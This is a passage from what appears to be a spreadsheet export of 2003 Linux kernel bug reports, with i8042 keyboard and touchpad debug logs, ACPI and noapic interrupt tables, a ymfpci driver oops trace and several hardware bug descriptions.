(parameter) [21] atkbd.c: Sent: f2 drivers/input/serio/i8042.c: 92 -&gt; i8042 (command) [22] drivers/input/serio/i8042.c: f2 -&gt; i8042 (parameter) [22] drivers/input/serio/i8042.c: fa &lt;- i8042 (interrupt, aux2, 12) [30] atkbd.c: Received fa flags 00 drivers/input/serio/i8042.c: 00 &lt;- i8042 (interrupt, aux2, 12) [32] atkbd.c: Received 00 flags 00 drivers/input/serio/i8042.c: 60 -&gt; i8042 (command) [32] drivers/input/serio/i8042.c: 00 -&gt; i8042 (parameter) [32] drivers/input/serio/i8042.c: 60 -&gt; i8042 (command) [32] drivers/input/serio/i8042.c: 02 -&gt; i8042 (parameter) [32] drivers/input/serio/i8042.c: 92 -&gt; i8042 (command) [33] drivers/input/serio/i8042.c: f2 -&gt; i8042 (parameter) [33] drivers/input/serio/i8042.c: fa &lt;- i8042 (interrupt, aux2, 12) [44] drivers/input/serio/i8042.c: 00 &lt;- i8042 (interrupt, aux2, 12) [49] drivers/input/serio/i8042.c: 92 -&gt; i8042 (command) [49] drivers/input/serio/i8042.c: f6 -&gt; i8042 (parameter) [49] drivers/input/serio/i8042.c: fa &lt;- i8042 (interrupt, aux2, 12) [53] drivers/input/serio/i8042.c: 92 -&gt; i8042 (command) [53] drivers/input/serio/i8042.c: e8 -&gt; i8042 (parameter) [53] drivers/input/serio/i8042.c: fa &lt;- i8042 (interrupt, aux2, 12) [57] drivers/input/serio/i8042.c: 92 -&gt; i8042 (command) [57] drivers/input/serio/i8042.c: 00 -&gt; i8042 (parameter) [57] drivers/input/serio/i8042.c: fa &lt;- i8042 (interrupt, aux2, 12) [71] drivers/input/serio/i8042.c: 92 -&gt; i8042 (command) [71] drivers/input/serio/i8042.c: e8 -&gt; i8042 (parameter) [71] drivers/input/serio/i8042.c: fa &lt;- i8042 (interrupt, aux2, 12) [75] drivers/input/serio/i8042.c: 92 -&gt; i8042 (command) [75] drivers/input/serio/i8042.c: 00 -&gt; i8042 (parameter) [75] drivers/input/serio/i8042.c: fa &lt;- i8042 (interrupt, aux2, 12) [81] drivers/input/serio/i8042.c: 92 -&gt; i8042 (command) [81] drivers/input/serio/i8042.c: e8 -&gt; i8042 (parameter) [81] drivers/input/serio/i8042.c: fa &lt;- i8042 (interrupt, aux2, 12) [85] drivers/input/serio/i8042.c: 92 -&gt; i8042 (command) [85] drivers/input/serio/i8042.c: 00 -&gt; i8042 (parameter) [85] drivers/input/serio/i8042.c: fa &lt;- i8042 (interrupt, aux2, 12) [96] drivers/input/serio/i8042.c: 92 -&gt; i8042 (command) [96] drivers/input/serio/i8042.c: e8 -&gt; i8042 (parameter) [96] drivers/input/serio/i8042.c: fa &lt;- i8042 (interrupt, aux2, 12) [102] drivers/input/serio/i8042.c: 92 -&gt; i8042 (command) [102] drivers/input/serio/i8042.c: 00 -&gt; i8042 (parameter) [102] drivers/input/serio/i8042.c: fa &lt;- i8042 (interrupt, aux2, 12) [106] drivers/input/serio/i8042.c: 92 -&gt; i8042 (command) [106] drivers/input/serio/i8042.c: e9 -&gt; i8042 (parameter) [106] drivers/input/serio/i8042.c: fa &lt;- i8042 (interrupt, aux2, 12) [110] drivers/input/serio/i8042.c: 01 &lt;- i8042 (interrupt, aux2, 12) [122] drivers/input/serio/i8042.c: 47 &lt;- i8042 (interrupt, aux2, 12) [124] drivers/input/serio/i8042.c: 15 &lt;- i8042 (interrupt, aux2, 12) [126] drivers/input/serio/i8042.c: 92 -&gt; i8042 (command) [126] drivers/input/serio/i8042.c: ff -&gt; i8042 (parameter) [126] drivers/input/serio/i8042.c: fa &lt;- i8042 (interrupt, aux2, 12) [132] drivers/input/serio/i8042.c: aa &lt;- i8042 (interrupt, aux2, 12) [492] drivers/input/serio/i8042.c: 00 &lt;- i8042 (interrupt, aux2, 12) [494] drivers/input/serio/i8042.c: 92 -&gt; i8042 (command) [494] drivers/input/serio/i8042.c: e6 -&gt; i8042 (parameter) [494] drivers/input/serio/i8042.c: fa &lt;- i8042 (interrupt, aux2, 12) [506] drivers/input/serio/i8042.c: 92 -&gt; i8042 (command) [506] drivers/input/serio/i8042.c: e8 -&gt; i8042 (parameter) [506] drivers/input/serio/i8042.c: fa &lt;- i8042 (interrupt, aux2, 12) [512] drivers/input/serio/i8042.c: 92 -&gt; i8042 (command) [512] drivers/input/serio/i8042.c: 00 -&gt; i8042 (parameter) [512] drivers/input/serio/i8042.c: fa &lt;- i8042 (interrupt, aux2, 12) [516] drivers/input/serio/i8042.c: 92 -&gt; i8042 (command) [516] drivers/input/serio/i8042.c: e8 -&gt; i8042 (parameter) [516] drivers/input/serio/i8042.c: fa &lt;- i8042 (interrupt, aux2, 12) [522] drivers/input/serio/i8042.c: 92 -&gt; i8042 (command) [522] drivers/input/serio/i8042.c: 00 -&gt; i8042 (parameter) [522] drivers/input/serio/i8042.c: fa &lt;- i8042 (interrupt, aux2, 12) [534] drivers/input/serio/i8042.c: 92 -&gt; i8042 (command) [534] drivers/input/serio/i8042.c: e8 -&gt; i8042 (parameter) [534] drivers/input/serio/i8042.c: fa &lt;- i8042 (interrupt, aux2, 12) [538] drivers/input/serio/i8042.c: 92 -&gt; i8042 (command) [538] drivers/input/serio/i8042.c: 00 -&gt; i8042 (parameter) [538] drivers/input/serio/i8042.c: fa &lt;- i8042 (interrupt, aux2, 12) [545] drivers/input/serio/i8042.c: 92 -&gt; i8042 (command) [545] drivers/input/serio/i8042.c: e8 -&gt; i8042 (parameter) [545] drivers/input/serio/i8042.c: fa &lt;- i8042 (interrupt, aux2, 12) [549] drivers/input/serio/i8042.c: 92 -&gt; i8042 (command) [549] drivers/input/serio/i8042.c: 00 -&gt; i8042 (parameter) [549] drivers/input/serio/i8042.c: fa &lt;- i8042 (interrupt, aux2, 12) [560] drivers/input/serio/i8042.c: 92 -&gt; i8042 (command) [560] drivers/input/serio/i8042.c: e9 -&gt; i8042 (parameter) [560] drivers/input/serio/i8042.c: fa &lt;- i8042 (interrupt, aux2, 12) [566] drivers/input/serio/i8042.c: 01 &lt;- i8042 (interrupt, aux2, 12) [568] drivers/input/serio/i8042.c: 47 &lt;- i8042 (interrupt, aux2, 12) [570] drivers/input/serio/i8042.c: 15 &lt;- i8042 (interrupt, aux2, 12) [572] drivers/input/serio/i8042.c: 92 -&gt; i8042 (command) [572] drivers/input/serio/i8042.c: e6 -&gt; i8042 (parameter) [572] drivers/input/serio/i8042.c: fa &lt;- i8042 (interrupt, aux2, 12) [585] drivers/input/serio/i8042.c: 92 -&gt; i8042 (command) [585] drivers/input/serio/i8042.c: e8 -&gt; i8042 (parameter) [585] drivers/input/serio/i8042.c: fa &lt;- i8042 (interrupt, aux2, 12) [589] drivers/input/serio/i8042.c: 92 -&gt; i8042 (command) [589] drivers/input/serio/i8042.c: 00 -&gt; i8042 (parameter) [589] drivers/input/serio/i8042.c: fa &lt;- i8042 (interrupt, aux2, 12) [596] drivers/input/serio/i8042.c: 92 -&gt; i8042 (command) [596] drivers/input/serio/i8042.c: e8 -&gt; i8042 (parameter) [596] drivers/input/serio/i8042.c: fa &lt;- i8042 (interrupt, aux2, 12) [600] drivers/input/serio/i8042.c: 92 -&gt; i8042 (command) [600] drivers/input/serio/i8042.c: 00 -&gt; i8042 (parameter) [600] drivers/input/serio/i8042.c: fa &lt;- i8042 (interrupt, aux2, 12) [611] drivers/input/serio/i8042.c: 92 -&gt; i8042 (command) [611] drivers/input/serio/i8042.c: e8 -&gt; i8042 (parameter) [611] drivers/input/serio/i8042.c: fa &lt;- i8042 (interrupt, aux2, 12) [616] drivers/input/serio/i8042.c: 92 -&gt; i8042 (command) [616] drivers/input/serio/i8042.c: 00 -&gt; i8042 (parameter) [616] drivers/input/serio/i8042.c: fa &lt;- i8042 (interrupt, aux2, 12) [620] drivers/input/serio/i8042.c: 92 -&gt; i8042 (command) [620] drivers/input/serio/i8042.c: e8 -&gt; i8042 (parameter) [620] drivers/input/serio/i8042.c: fa &lt;- i8042 (interrupt, aux2, 12) [624] drivers/input/serio/i8042.c: 92 -&gt; i8042 (command) [624] drivers/input/serio/i8042.c: 03 -&gt; i8042 (parameter) [624] drivers/input/serio/i8042.c: fa &lt;- i8042 (interrupt, aux2, 12) [638] drivers/input/serio/i8042.c: 92 -&gt; i8042 (command) [638] drivers/input/serio/i8042.c: e9 -&gt; i8042 (parameter) [638] drivers/input/serio/i8042.c: fa &lt;- i8042 (interrupt, aux2, 12) [642] drivers/input/serio/i8042.c: 8f &lt;- i8042 (interrupt, aux2, 12) [644] drivers/input/serio/i8042.c: 40 &lt;- i8042 (interrupt, aux2, 12) [649] drivers/input/serio/i8042.c: b1 &lt;- i8042 (interrupt, aux2, 12) [651] drivers/input/serio/i8042.c: 92 -&gt; i8042 (command) [651] drivers/input/serio/i8042.c: e6 -&gt; i8042 (parameter) [651] drivers/input/serio/i8042.c: fa &lt;- i8042 (interrupt, aux2, 12) [661] drivers/input/serio/i8042.c: 92 -&gt; i8042 (command) [661] drivers/input/serio/i8042.c: e8 -&gt; i8042 (parameter) [661] drivers/input/serio/i8042.c: fa &lt;- i8042 (interrupt, aux2, 12) [667] drivers/input/serio/i8042.c: 92 -&gt; i8042 (command) [667] drivers/input/serio/i8042.c: 00 -&gt; i8042 (parameter) [667] drivers/input/serio/i8042.c: fa &lt;- i8042 (interrupt, aux2, 12) [671] drivers/input/serio/i8042.c: 92 -&gt; i8042 (command) [671] drivers/input/serio/i8042.c: e8 -&gt; i8042 (parameter) [671] drivers/input/serio/i8042.c: fa &lt;- i8042 (interrupt, aux2, 12) [675] drivers/input/serio/i8042.c: 92 -&gt; i8042 (command) [675] drivers/input/serio/i8042.c: 00 -&gt; i8042 (parameter) [675] drivers/input/serio/i8042.c: fa &lt;- i8042 (interrupt, aux2, 12) [689] drivers/input/serio/i8042.c: 92 -&gt; i8042 (command) [689] drivers/input/serio/i8042.c: e8 -&gt; i8042 (parameter) [689] drivers/input/serio/i8042.c: fa &lt;- i8042 (interrupt, aux2, 12) [693] drivers/input/serio/i8042.c: 92 -&gt; i8042 (command) [693] drivers/input/serio/i8042.c: 00 -&gt; i8042 (parameter) [693] drivers/input/serio/i8042.c: fa &lt;- i8042 (interrupt, aux2, 12) [699] drivers/input/serio/i8042.c: 92 -&gt; i8042 (command) [699] drivers/input/serio/i8042.c: e8 -&gt; i8042 (parameter) [699] drivers/input/serio/i8042.c: fa &lt;- i8042 (interrupt, aux2, 12) [703] drivers/input/serio/i8042.c: 92 -&gt; i8042 (command) [703] drivers/input/serio/i8042.c: 02 -&gt; i8042 (parameter) [703] drivers/input/serio/i8042.c: fa &lt;- i8042 (interrupt, aux2, 12) [714] drivers/input/serio/i8042.c: 92 -&gt; i8042 (command) [714] drivers/input/serio/i8042.c: e9 -&gt; i8042 (parameter) [714] drivers/input/serio/i8042.c: fa &lt;- i8042 (interrupt, aux2, 12) [720] drivers/input/serio/i8042.c: 80 &lt;- i8042 (interrupt, aux2, 12) [722] drivers/input/serio/i8042.c: 47 &lt;- i8042 (interrupt, aux2, 12) [724] drivers/input/serio/i8042.c: 1b &lt;- i8042 (interrupt, aux2, 12) [726] drivers/input/serio/i8042.c: 92 -&gt; i8042 (command) [726] drivers/input/serio/i8042.c: e6 -&gt; i8042 (parameter) [726] drivers/input/serio/i8042.c: fa &lt;- i8042 (interrupt, aux2, 12) [739] drivers/input/serio/i8042.c: 92 -&gt; i8042 (command) [739] drivers/input/serio/i8042.c: e8 -&gt; i8042 (parameter) [739] drivers/input/serio/i8042.c: fa &lt;- i8042 (interrupt, aux2, 12) [743] drivers/input/serio/i8042.c: 92 -&gt; i8042 (command) [743] drivers/input/serio/i8042.c: 03 -&gt; i8042 (parameter) [743] drivers/input/serio/i8042.c: fa &lt;- i8042 (interrupt, aux2, 12) [750] drivers/input/serio/i8042.c: 92 -&gt; i8042 (command) [750] drivers/input/serio/i8042.c: e8 -&gt; i8042 (parameter) [750] drivers/input/serio/i8042.c: fa &lt;- i8042 (interrupt, aux2, 12) [754] drivers/input/serio/i8042.c: 92 -&gt; i8042 (command) [754] drivers/input/serio/i8042.c: 00 -&gt; i8042 (parameter) [754] drivers/input/serio/i8042.c: fa &lt;- i8042 (interrupt, aux2, 12) [765] drivers/input/serio/i8042.c: 92 -&gt; i8042 (command) [765] drivers/input/serio/i8042.c: e8 -&gt; i8042 (parameter) [765] drivers/input/serio/i8042.c: fa &lt;- i8042 (interrupt, aux2, 12) [771] drivers/input/serio/i8042.c: 92 -&gt; i8042 (command) [771] drivers/input/serio/i8042.c: 01 -&gt; i8042 (parameter) [771] drivers/input/serio/i8042.c: fa &lt;- i8042 (interrupt, aux2, 12) [775] drivers/input/serio/i8042.c: 92 -&gt; i8042 (command) [775] drivers/input/serio/i8042.c: e8 -&gt; i8042 (parameter) [775] drivers/input/serio/i8042.c: fa &lt;- i8042 (interrupt, aux2, 12) [778] drivers/input/serio/i8042.c: 92 -&gt; i8042 (command) [778] drivers/input/serio/i8042.c: 01 -&gt; i8042 (parameter) [778] drivers/input/serio/i8042.c: fa &lt;- i8042 (interrupt, aux2, 12) [792] drivers/input/serio/i8042.c: 92 -&gt; i8042 (command) [792] drivers/input/serio/i8042.c: f3 -&gt; i8042 (parameter) [792] drivers/input/serio/i8042.c: fa &lt;- i8042 (interrupt, aux2, 12) [796] drivers/input/serio/i8042.c: 92 -&gt; i8042 (command) [796] drivers/input/serio/i8042.c: 14 -&gt; i8042 (parameter) [796] drivers/input/serio/i8042.c: fa &lt;- i8042 (interrupt, aux2, 12) [803] drivers/input/serio/i8042.c: 92 -&gt; i8042 (command) [803] drivers/input/serio/i8042.c: f4 -&gt; i8042 (parameter) [803] drivers/input/serio/i8042.c: fa &lt;- i8042 (interrupt, aux2, 12) [807] Synaptics Touchpad, model: 1 Firware: 5.1 180 degree mounted touchpad Sensor: 15 new absolute packet format Touchpad has extended capability bits -&gt; four buttons -&gt; multifinger detection -&gt; palm detection input: Synaptics Synaptics TouchPad on isa0060/serio3 drivers/input/serio/i8042.c: 92 -&gt; i8042 (command) [807] drivers/input/serio/i8042.c: f3 -&gt; i8042 (parameter) [807] drivers/input/serio/i8042.c: fa &lt;- i8042 (interrupt, aux2, 12) [818] drivers/input/serio/i8042.c: 92 -&gt; i8042 (command) [818] drivers/input/serio/i8042.c: 64 -&gt; i8042 (parameter) [818] drivers/input/serio/i8042.c: fa &lt;- i8042 (interrupt, aux2, 12) [823] drivers/input/serio/i8042.c: 92 -&gt; i8042 (command) [823] drivers/input/serio/i8042.c: f3 -&gt; i8042 (parameter) [823] drivers/input/serio/i8042.c: fa &lt;- i8042 (interrupt, aux2, 12) [827] drivers/input/serio/i8042.c: 92 -&gt; i8042 (command) [827] drivers/input/serio/i8042.c: c8 -&gt; i8042 (parameter) [827] drivers/input/serio/i8042.c: fa &lt;- i8042 (interrupt, aux2, 12) [831] drivers/input/serio/i8042.c: 92 -&gt; i8042 (command) [831] drivers/input/serio/i8042.c: e8 -&gt; i8042 (parameter) [831] drivers/input/serio/i8042.c: fa &lt;- i8042 (interrupt, aux2, 12) [845] drivers/input/serio/i8042.c: 92 -&gt; i8042 (command) [845] drivers/input/serio/i8042.c: 03 -&gt; i8042 (parameter) [845] drivers/input/serio/i8042.c: fa &lt;- i8042 (interrupt, aux2, 12) [849] drivers/input/serio/i8042.c: 92 -&gt; i8042 (command) [849] drivers/input/serio/i8042.c: e6 -&gt; i8042 (parameter) [849] drivers/input/serio/i8042.c: fa &lt;- i8042 (interrupt, aux2, 12) [856] drivers/input/serio/i8042.c: 92 -&gt; i8042 (command) [856] drivers/input/serio/i8042.c: ea -&gt; i8042 (parameter) [856] drivers/input/serio/i8042.c: fa &lt;- i8042 (interrupt, aux2, 12) [859] drivers/input/serio/i8042.c: 92 -&gt; i8042 (command) [859] drivers/input/serio/i8042.c: f4 -&gt; i8042 (parameter) [859] drivers/input/serio/i8042.c: fa &lt;- i8042 (interrupt, aux2, 12) [870] serio: i8042 AUX2 port at 0x60,0x64 irq 12 drivers/input/serio/i8042.c: 60 -&gt; i8042 (command) [870] drivers/input/serio/i8042.c: 02 -&gt; i8042 (parameter) [870] atkbd.c: Sent: f2 drivers/input/serio/i8042.c: 93 -&gt; i8042 (command) [870] drivers/input/serio/i8042.c: f2 -&gt; i8042 (parameter) [870] drivers/input/serio/i8042.c: fe &lt;- i8042 (interrupt, aux3, 12) [872] atkbd.c: Received fe flags 00 atkbd.c: Sent: ed drivers/input/serio/i8042.c: 93 -&gt; i8042 (command) [872] drivers/input/serio/i8042.c: ed -&gt; i8042 (parameter) [872] drivers/input/serio/i8042.c: fe &lt;- i8042 (interrupt, aux3, 12) [873] atkbd.c: Received fe flags 00 drivers/input/serio/i8042.c: 93 -&gt; i8042 (command) [873] drivers/input/serio/i8042.c: f2 -&gt; i8042 (parameter) [873] drivers/input/serio/i8042.c: fe &lt;- i8042 (interrupt, aux3, 12) [874] serio: i8042 AUX3 port at 0x60,0x64 irq 12 drivers/input/serio/i8042.c: 60 -&gt; i8042 (command) [874] drivers/input/serio/i8042.c: 02 -&gt; i8042 (parameter) [874] drivers/input/serio/i8042.c: 60 -&gt; i8042 (command) [874] drivers/input/serio/i8042.c: 03 -&gt; i8042 (parameter) [874] atkbd.c: Sent: f2 drivers/input/serio/i8042.c: f2 -&gt; i8042 (kbd-data) [875] drivers/input/serio/i8042.c: fa &lt;- i8042 (interrupt, kbd, 1) [876] atkbd.c: Received fa flags 00 drivers/input/serio/i8042.c: ab &lt;- i8042 (interrupt, kbd, 1) [880] atkbd.c: Received ab flags 00 drivers/input/serio/i8042.c: 83 &lt;- i8042 (interrupt, kbd, 1) [881] atkbd.c: Received 83 flags 00 atkbd.c: Sent: ed drivers/input/serio/i8042.c: ed -&gt; i8042 (kbd-data) [881] drivers/input/serio/i8042.c: fa &lt;- i8042 (interrupt, kbd, 1) [881] atkbd.c: Received fa flags 00 atkbd.c: Sent: 00 drivers/input/serio/i8042.c: 00 -&gt; i8042 (kbd-data) [882] drivers/input/serio/i8042.c: fa &lt;- i8042 (interrupt, kbd, 1) [883] atkbd.c: Received fa flags 00 atkbd.c: Sent: f8 drivers/input/serio/i8042.c: f8 -&gt; i8042 (kbd-data) [883] drivers/input/serio/i8042.c: fe &lt;- i8042 (interrupt, kbd, 1) [884] atkbd.c: Received fe flags 00 atkbd.c: Sent: f4 drivers/input/serio/i8042.c: f4 -&gt; i8042 (kbd-data) [884] drivers/input/serio/i8042.c: fa &lt;- i8042 (interrupt, kbd, 1) [885] atkbd.c: Received fa flags 00 atkbd.c: Sent: f0 drivers/input/serio/i8042.c: f0 -&gt; i8042 (kbd-data) [885] drivers/input/serio/i8042.c: fa &lt;- i8042 (interrupt, kbd, 1) [885] atkbd.c: Received fa flags 00 atkbd.c: Sent: 02 drivers/input/serio/i8042.c: 02 -&gt; i8042 (kbd-data) [885] drivers/input/serio/i8042.c: fa &lt;- i8042 (interrupt, kbd, 1) [886] atkbd.c: Received fa flags 00 atkbd.c: Sent: f0 drivers/input/serio/i8042.c: f0 -&gt; i8042 (kbd-data) [886] drivers/input/serio/i8042.c: fa &lt;- i8042 (interrupt, kbd, 1) [887] atkbd.c: Received fa flags 00 atkbd.c: Sent: 00 drivers/input/serio/i8042.c: 00 -&gt; i8042 (kbd-data) [887] drivers/input/serio/i8042.c: fa &lt;- i8042 (interrupt, kbd, 1) [887] atkbd.c: Received fa flags 00 drivers/input/serio/i8042.c: 02 &lt;- i8042 (interrupt, kbd, 1) [890] atkbd.c: Received 02 flags 00 input: AT Set 2 keyboard on isa0060/serio0 serio: i8042 KBD port at 0x60,0x64 irq 1 [...] atkbd.c: Sent: ed drivers/input/serio/i8042.c: ed -&gt; i8042 (kbd-data) [25800] drivers/input/serio/i8042.c: fa &lt;- i8042 (interrupt, kbd, 1) [25800] atkbd.c: Received fa flags 00 atkbd.c: Sent: 02 drivers/input/serio/i8042.c: 02 -&gt; i8042 (kbd-data) [25800] drivers/input/serio/i8042.c: fa &lt;- i8042 (interrupt, kbd, 1) [25802] atkbd.c: Received fa flags 00 atkbd.c: Sent: ed drivers/input/serio/i8042.c: ed -&gt; i8042 (kbd-data) [38146] drivers/input/serio/i8042.c: fa &lt;- i8042 (interrupt, kbd, 1) [38146] atkbd.c: Received fa flags 00 atkbd.c: Sent: 00 drivers/input/serio/i8042.c: 00 -&gt; i8042 (kbd-data) [38146] drivers/input/serio/i8042.c: fa &lt;- i8042 (interrupt, kbd, 1) [38148] atkbd.c: Received fa flags 00 Steps to reproduce: boot the kernel on my laptop</t>
  </si>
  <si>
    <t>acpi ignores the 'noapic' boot option</t>
  </si>
  <si>
    <t>2003-08-14 14:47 UTC</t>
  </si>
  <si>
    <t>2004-03-03 21:58 UTC</t>
  </si>
  <si>
    <t>Distribution: RHL 10.0 beta1 Hardware Environment: SE7505VB2 Problem Description: ACPI appears to be inclined to use the IO-APIC, even if the 'noapic' cmdline option is used. Steps to reproduce: boot using 'noacpi' cmdline option, and observe /proc/interrupts noapic does seem to work if 'pci=noacpi' or 'acpi=off' :::::::::::::: interrupts-2.6-noapic (note here that acpi is enabled by default) :::::::::::::: CPU0 CPU1 0: 11415 0 XT-PIC timer 1: 4 0 XT-PIC keyboard 2: 0 0 XT-PIC cascade 4: 628 0 XT-PIC serial 8: 1 0 XT-PIC rtc 9: 0 0 XT-PIC acpi 12: 40 0 XT-PIC PS/2 Mouse 14: 3619 0 XT-PIC ide0 15: 20 0 XT-PIC ide1 16: 0 0 IO-APIC-level usb-uhci 18: 7 0 IO-APIC-level usb-uhci, eth3 19: 0 0 IO-APIC-level usb-uhci 21: 8 0 IO-APIC-level eth2 28: 10 0 IO-APIC-level eth0 48: 9 0 IO-APIC-level eth1 52: 31 0 IO-APIC-level eth4 NMI: 0 0 LOC: 11334 11331 ERR: 9253 MIS: 0 :::::::::::::: interrupts-2.6-acpi=off :::::::::::::: CPU0 0: 95726 IO-APIC-edge timer 1: 13 IO-APIC-edge i8042 2: 0 XT-PIC cascade 4: 564 IO-APIC-edge serial 12: 52 IO-APIC-edge i8042 14: 2836 IO-APIC-edge ide0 15: 22 IO-APIC-edge ide1 16: 0 IO-APIC-level uhci-hcd 18: 7 IO-APIC-level uhci-hcd, eth3 19: 0 IO-APIC-level uhci-hcd 21: 8 IO-APIC-level eth2 28: 10 IO-APIC-level eth0 48: 9 IO-APIC-level eth1 52: 33 IO-APIC-level eth4 NMI: 0 LOC: 95506 ERR: 0 MIS: 0 :::::::::::::: interrupts-2.6-acpi=off-noapic :::::::::::::: CPU0 0: 86895 XT-PIC timer 1: 12 XT-PIC i8042 2: 0 XT-PIC cascade 4: 499 XT-PIC serial 5: 7 XT-PIC uhci-hcd, eth3 10: 0 XT-PIC uhci-hcd 11: 53 XT-PIC uhci-hcd, eth0, eth1, eth2, eth4 12: 52 XT-PIC i8042 14: 2825 XT-PIC ide0 15: 20 XT-PIC ide1 NMI: 0 LOC: 86726 ERR: 0 MIS: 0 :::::::::::::: interrupts-2.6-pci=noacpi-noapic :::::::::::::: CPU0 CPU1 0: 90077 0 XT-PIC timer 1: 12 0 XT-PIC i8042 2: 0 0 XT-PIC cascade 4: 559 0 XT-PIC serial 5: 7 0 XT-PIC uhci-hcd, eth3 9: 0 0 XT-PIC acpi 10: 0 0 XT-PIC uhci-hcd 11: 51 0 XT-PIC uhci-hcd, eth0, eth1, eth2, eth4 12: 52 0 XT-PIC i8042 14: 3020 0 XT-PIC ide0 15: 20 0 XT-PIC ide1 NMI: 0 0 LOC: 89814 89803 ERR: 0 MIS: 0</t>
  </si>
  <si>
    <t>ymfpci load: segmentation error (2.6.0-test3 arjanv RPM)</t>
  </si>
  <si>
    <t>2003-08-15 15:12 UTC</t>
  </si>
  <si>
    <t>angus</t>
  </si>
  <si>
    <t>2004-01-19 04:57 UTC</t>
  </si>
  <si>
    <t>PCI: Found IRQ 9 for device 0000:00:12.0 ymfpci: YMF724 at 0xed000000 IRQ 9 ac97_codec: AC97 Audio codec, id: 0x8384:0x7605 (SigmaTel STAC9704) ymfpci: no codec attached ? Unable to handle kernel NULL pointer dereference at virtual address 00000000 printing eip: d092cc07 *pde = 00000000 Oops: 0000 [#1] CPU: 0 EIP: 0060:[&lt;d092cc07&gt;] Not tainted EFLAGS: 00210246 EIP is at ac97_release_codec+0x27/0x70 [ac97_codec] eax: 00000077 ebx: d09303b8 ecx: d09303b8 edx: cffea8e4 esi: 00000000 edi: d0940000 ebp: cfe3ada8 esp: c3751eb8 ds: 007b es: 007b ss: 0068 Process modprobe (pid: 18604, threadinfo=c3750000 task=c164a180) Stack: 00000000 ed000000 d098a641 00000000 ffffffed c7c93c08 c7c93c08 c32658e4 c017af70 d0993100 ffffffed cfe3ada8 00000000 c01a9be2 cfe3ada8 d098ce60 cfe3ada8 d0993100 ffffffed c01a9cf7 d0993100 cfe3ada8 d0993100 cfe3ada8 Call Trace: [&lt;d098a641&gt;] ymf_probe_one+0x2e1/0x350 [ymfpci] [&lt;c017af70&gt;] sysfs_create+0x50/0x80 [&lt;c01a9be2&gt;] pci_device_probe_static+0x32/0x50 [&lt;c01a9cf7&gt;] __pci_device_probe+0x27/0x40 [&lt;c01a9d2f&gt;] pci_device_probe+0x1f/0x40 [&lt;c01e6b74&gt;] bus_match+0x34/0x60 [&lt;c01e6c67&gt;] driver_attach+0x57/0x60 [&lt;c01e6eb9&gt;] bus_add_driver+0x79/0x90 [&lt;c01e725d&gt;] driver_register+0x2d/0x40 [&lt;c01a9f72&gt;] pci_register_driver+0x62/0x80 [&lt;d082e00b&gt;] ymf_init_module+0xb/0x2e [ymfpci] [&lt;c012e4cd&gt;] sys_init_module+0xed/0x1d0 [&lt;c010a7d7&gt;] syscall_call+0x7/0xb Code: 8b 06 8b 56 04 89 50 04 c7 46 04 00 02 20 00 89 02 c7 06 00</t>
  </si>
  <si>
    <t>2.6.0</t>
  </si>
  <si>
    <t>Kam Leo</t>
  </si>
  <si>
    <t>ACPI options tree inaccessible when SMP off</t>
  </si>
  <si>
    <t>Config-Processors</t>
  </si>
  <si>
    <t>2.6.0-test3-bk3</t>
  </si>
  <si>
    <t>2003-08-16 12:29 UTC</t>
  </si>
  <si>
    <t>2004-03-03 21:59 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo GNU/Linux Hardware Environment: Dell Inspiron 8100 Software Environment: XFree 4.3.0 Problem Description: ACPI options tree inaccessible when SMP off Steps to reproduce: (1) make menuconfig on a fresh source tree (2) turn smp off (3) try to enter the acpi options tree which is not possible since it is locked Hello I just migrated my 2.6.0-test3-bk1 config to 2.6.0-test3-bk3 and then found that I could not get into ACPI at all. So I hacked around and found that I could only get into ACPI to turn it on when SMP was enabled. Disabling it somehow disabled ACPI completely and I couldn't even get into its options using 'make menuconfig'. I've marked this as blocking as lack of good power management can be hazardous to laptop hardware. I've attached useful data to this bug. Many thanks</t>
  </si>
  <si>
    <t>OPL-3 synth doesn't work on SB16 (isapnp problem?)</t>
  </si>
  <si>
    <t>2003-08-17 02:34 UTC</t>
  </si>
  <si>
    <t>r6k</t>
  </si>
  <si>
    <t>2004-04-02 18:40 UTC</t>
  </si>
  <si>
    <t>Distribution: RedHat9 Hardware Environment: Ordinary x86 hardware Creative ViBRA16X PnP Software Environment: Kernel 2.6.0-test3, with ALSA Problem Description: The sound card works correctly, including the OPL3 midi synth, with stock RH9 (2.4.20-18.9) kernel using OSS. ALSA 0.9.4 also detects everything correctly on the same kernel, although I need to run a program "sbiload" to load std.o3 and drums.o3 before the hardware synthesizer will produce any sound. When running 2.6.0-test3 with ALSA, I get the following message when loading the sound modules: kernel: pnp: Device 01:01.00 activated. kernel: pnp SB16: port=0x220, mpu port=0x330, fm port=0x388 kernel: pnp SB16: dma1=1, dma2=-1, irq=10 kernel: SB [0x220]: DSP chip found, version = 4.16 kernel: OPL3: stat1 = 0xff kernel: OPL2/3 chip not detected at 0x388/0x38a kernel: sb16: no OPL device at 0x388-0x38a After that hardware MIDI cannot be used ("sbiload" refuses to run). inb(0x388) from user programs always gives 0xff. Originally I have no /etc/isapnp.conf file. After I /sbin/isapnp'd a isapnp.conf file containing just (IO 2 (BASE 0x388)) in the sound card section, then rmmod'd and reloaded the sound modules, everything works fine (of course "sbiload" is still required). Therefore I suspect this to be a PnP problem. Also, the address range 0x388-xxx doesn't show up on /proc/ioports, with or without this workaround. I think this is potentially dangerous. Steps to reproduce: Run a sb16 card with ALSA drivers, without any /etc/isapnp.conf. The OPL-3 chip isn't recognized.</t>
  </si>
  <si>
    <t>Kernel hangs when APIC/ACPI enabled</t>
  </si>
  <si>
    <t>2003-08-17 09:06 UTC</t>
  </si>
  <si>
    <t>Jonathan Heaney</t>
  </si>
  <si>
    <t>2004-03-03 22:00 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo x86 Hardware Environment: AMD KT266A/AthlonXP Software Environment: GCC-3.2.3 Problem Description: System locks up at "mice: PS/2 mouse device common for all mice" during kernel boot. Problem first appeared in 2.6.0-test3-bk3 (_may_ have been in bk2, I went from bk2-&gt;bk3). Unresolved as of bk5. During boot (prior to lockup), these lines appear, that I have never seen before with any other kernels: PCI VIA IRQ Fixup for 0000:00:11:2 from 15 to 11 PCI VIA IRQ Fixup for 0000:00:11:3 from 15 to 11 These are for the 2 USB headers that I've enabled. I use the Bios to force the USB devices to IRQ 15 (which they share with my Intel PCI Ethernet card). I have an all-SCSI system, neither IDE port is enabled in Bios so IRQ 15 is free. IRQ 11 is vga card. This setup has always worked (had Linux on it since the box was built). The only ACPI feature I'm using is Button. This may be similar to bug 1115 http://bugzilla.kernel.org/show_bug.cgi?id=1115 And should block bug 845.</t>
  </si>
  <si>
    <t>Kernel oops</t>
  </si>
  <si>
    <t>V2.6.0-test3</t>
